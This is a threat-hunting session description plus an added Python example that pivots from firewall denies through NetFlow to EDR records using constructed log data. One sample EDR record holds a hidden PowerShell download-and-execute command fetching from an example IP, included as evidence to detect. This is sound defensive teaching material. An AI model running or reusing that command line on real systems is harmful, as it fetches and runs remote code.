You have lots of security-related data, and it is not all created equal. Effective threat hunting and incident response require you to pivot quickly and efficiently between the low- and high-fidelity data that lives in firewalls, intrusion prevention systems, security information and event management (SIEM) platforms, flow collectors and similar systems. Understanding the data elements these disparate systems have in common (source and destination addresses, ports, hostnames, timestamps) lets your team move efficiently from low-fidelity data, which is cheap to search and suited to rapid root-cause analysis, to high-fidelity data that can serve as the basis for conviction.
In this session, we will:
- Explore examples of low-, medium- and high-fidelity security data
- Define data pivots and provide real-world examples
- Discuss the steps for creating pivot tables
- Demonstrate how data pivots greatly improve incident response
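To make the idea of a data pivot concrete before the session, here is an added example that is not part of the session material: three constructed log sources (firewall, NetFlow, EDR) are joined on the fields they share, the source IP and a time window, so that a low-fidelity firewall deny leads to the high-fidelity EDR process record that can convict. The `pivot_table` helper is the group-and-sum step behind a pivot table. All records, hostnames, addresses and the command line are constructed sample data.

```python
"""Added example (not from the session): pivoting from a low-fidelity firewall
deny to NetFlow and EDR records on shared fields (source IP, time window).
All records below are constructed sample data."""
from collections import defaultdict
from datetime import datetime, timedelta

# Low fidelity: firewall events. Cheap to search, little context. (constructed)
FIREWALL = [
    {"ts": "2024-03-01T10:02:11", "src": "10.0.5.23", "dst": "203.0.113.9", "dport": 4444, "action": "deny"},
    {"ts": "2024-03-01T10:02:40", "src": "10.0.5.23", "dst": "203.0.113.9", "dport": 4444, "action": "deny"},
    {"ts": "2024-03-01T10:15:03", "src": "10.0.7.8", "dst": "198.51.100.4", "dport": 443, "action": "allow"},
]

# Medium fidelity: NetFlow collected at the access layer, so attempts the
# perimeter later dropped still appear. Adds volume, still no process. (constructed)
NETFLOW = [
    {"ts": "2024-03-01T10:02:12", "src": "10.0.5.23", "dst": "203.0.113.9", "dport": 4444, "bytes": 1500},
    {"ts": "2024-03-01T10:03:50", "src": "10.0.5.23", "dst": "203.0.113.9", "dport": 4444, "bytes": 2000},
    {"ts": "2024-03-01T10:16:00", "src": "10.0.7.8", "dst": "198.51.100.4", "dport": 443, "bytes": 9000},
]

# High fidelity: EDR network events with the owning process. (constructed)
EDR = [
    {"ts": "2024-03-01T10:02:10", "host": "WS-0423", "ip": "10.0.5.23", "process": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.9/a')"},
    {"ts": "2024-03-01T10:15:02", "host": "WS-0311", "ip": "10.0.7.8", "process": "chrome.exe",
     "cmdline": "chrome.exe --type=renderer"},
]


def _ts(record):
    return datetime.fromisoformat(record["ts"])


def _near(a, b, window):
    """True when two records fall within `window` of each other."""
    return abs(_ts(a) - _ts(b)) <= window


def pivot(seed, window=timedelta(minutes=5)):
    """Pivot from one firewall record to the flow and EDR records that share its
    source IP (and, for flows, destination and port) inside the time window.
    The shared fields are the pivot keys."""
    flows = [f for f in NETFLOW
             if f["src"] == seed["src"] and f["dst"] == seed["dst"]
             and f["dport"] == seed["dport"] and _near(f, seed, window)]
    endpoint = [e for e in EDR if e["ip"] == seed["src"] and _near(e, seed, window)]
    return {"seed": seed, "flows": flows, "edr": endpoint,
            "bytes_out": sum(f["bytes"] for f in flows)}


def pivot_table(records, keys, value):
    """Group records by the given key fields and sum a numeric field: the
    pivot-table view used to see which (src, dst, port) tuples dominate."""
    table = defaultdict(int)
    for r in records:
        table[tuple(r[k] for k in keys)] += r[value]
    return dict(table)


def investigate_denies(window=timedelta(minutes=5)):
    """Start from every firewall deny and pivot once per distinct (src, dst, dport)."""
    seen, results = set(), []
    for fw in FIREWALL:
        key = (fw["src"], fw["dst"], fw["dport"])
        if fw["action"] != "deny" or key in seen:
            continue
        seen.add(key)
        results.append(pivot(fw, window))
    return results


if __name__ == "__main__":
    for r in investigate_denies():
        s = r["seed"]
        print(f"{s['src']} -> {s['dst']}:{s['dport']} denied; "
              f"{len(r['flows'])} flows, {r['bytes_out']} bytes out")
        for e in r["edr"]:
            print(f"  EDR {e['host']} {e['process']}: {e['cmdline']}")
    print(pivot_table(NETFLOW, ("src", "dst", "dport"), "bytes"))
```

The firewall alone says only that 10.0.5.23 was blocked twice on port 4444; the flow records show it kept trying; the EDR record ties the attempts to a hidden PowerShell download on WS-0423. The time window is deliberately a parameter, because clock skew between sources is the usual reason a pivot silently returns nothing.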